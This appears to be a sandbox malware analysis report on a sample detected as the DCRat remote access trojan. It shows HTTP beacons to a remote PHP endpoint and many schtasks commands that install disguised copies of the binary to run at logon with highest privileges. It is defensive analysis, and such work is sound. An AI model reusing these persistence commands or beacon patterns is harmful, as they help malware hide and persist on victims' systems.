Nov 24, 2024 04:03:45.299897909 CET	578	OUT	GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: a1043195.xsph.ru
Nov 24, 2024 04:03:45.727030993 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:03:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.5	49955	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:04:01.881330967 CET	582	OUT	GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:04:03.284887075 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:04:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:04:03.284953117 CET	224	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
Nov 24, 2024 04:04:03.284964085 CET	1236	IN	Data Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
Nov 24, 2024 04:04:03.285011053 CET	1236	IN	Data Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
Nov 24, 2024 04:04:03.285023928 CET	1236	IN	Data Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
Nov 24, 2024 04:04:03.285101891 CET	1236	IN	Data Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Nov 24, 2024 04:04:03.285114050 CET	1236	IN	Data Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
Nov 24, 2024 04:04:03.285130978 CET	1120	IN	Data Raw: 34 2e 31 33 31 20 31 30 36 2e 31 30 38 20 31 33 34 2e 35 31 34 20 31 30 35 2e 37 32 36 43 31 33 37 2e 33 38 33 20 31 30 33 2e 34 33 35 20 31 34 30 2e 30 36 20 31 30 30 2e 39 35 32 20 31 34 32 2e 35 34 37 20 39 38 2e 34 36 39 38 43 31 34 33 2e 35 Data Ascii: 4.131 106.108 134.514 105.726C137.383 103.435 140.06 100.952 142.547 98.4698C143.503 97.515 142.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.
Nov 24, 2024 04:04:03.285144091 CET	1236	IN	Data Raw: 33 30 38 2e 31 38 32 20 31 30 37 2e 34 34 36 20 33 30 39 2e 35 32 31 20 31 30 35 2e 37 32 38 43 33 30 39 2e 39 30 34 20 31 30 35 2e 31 35 35 20 33 30 39 2e 33 33 20 31 30 34 2e 32 20 33 30 38 2e 37 35 36 20 31 30 34 2e 32 43 33 30 35 2e 33 31 33 Data Ascii: 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 2
Nov 24, 2024 04:04:03.285157919 CET	1236	IN	Data Raw: 20 31 33 32 2e 39 38 33 20 34 31 2e 39 35 30 32 43 31 33 30 2e 36 38 38 20 34 33 2e 32 38 36 39 20 31 32 38 2e 32 30 32 20 34 34 2e 36 32 33 35 20 31 32 35 2e 37 31 35 20 34 35 2e 39 36 30 32 43 31 32 33 2e 34 32 20 34 37 2e 32 39 36 39 20 31 32 Data Ascii: 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.007
Nov 24, 2024 04:04:03.404767036 CET	1236	IN	Data Raw: 34 20 32 31 2e 32 38 34 36 20 31 31 38 2e 39 30 33 43 32 30 2e 33 32 38 33 20 31 31 38 2e 39 30 33 20 31 39 2e 33 37 32 20 31 31 38 2e 39 30 33 20 31 38 2e 34 31 35 36 20 31 31 38 2e 39 30 33 43 31 37 2e 36 35 30 36 20 31 31 38 2e 39 30 33 20 31 Data Ascii: 4 21.2846 118.903C20.3283 118.903 19.372 118.903 18.4156 118.903C17.6506 118.903 16.8855 119.285 16.503 120.049C16.3117 120.813 16.6942 121.577 17.0768 122.34C17.4593 123.104 18.0331 123.868 18.6069 124.823C17.268 124.632 15.9292 124.823 14.78
Nov 24, 2024 04:04:03.737644911 CET	558	OUT	GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru
Nov 24, 2024 04:04:04.183362007 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:04:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Target ID:	0
Start time:	22:01:56
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\4KjLUaW30K.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\4KjLUaW30K.exe"
Imagebase:	0x510000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:01:56
Start date:	23/11/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff669820000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:01:57
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:01:57
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:01:57
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:01:57
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:01:58
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:01:58
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:01:58
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\dllhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe'" /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff63ccf0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:01:59
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Imagebase:	0xaa0000
File size:	1'444'352 bytes
MD5 hash:	181D043C0617914801548F09D5B776D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
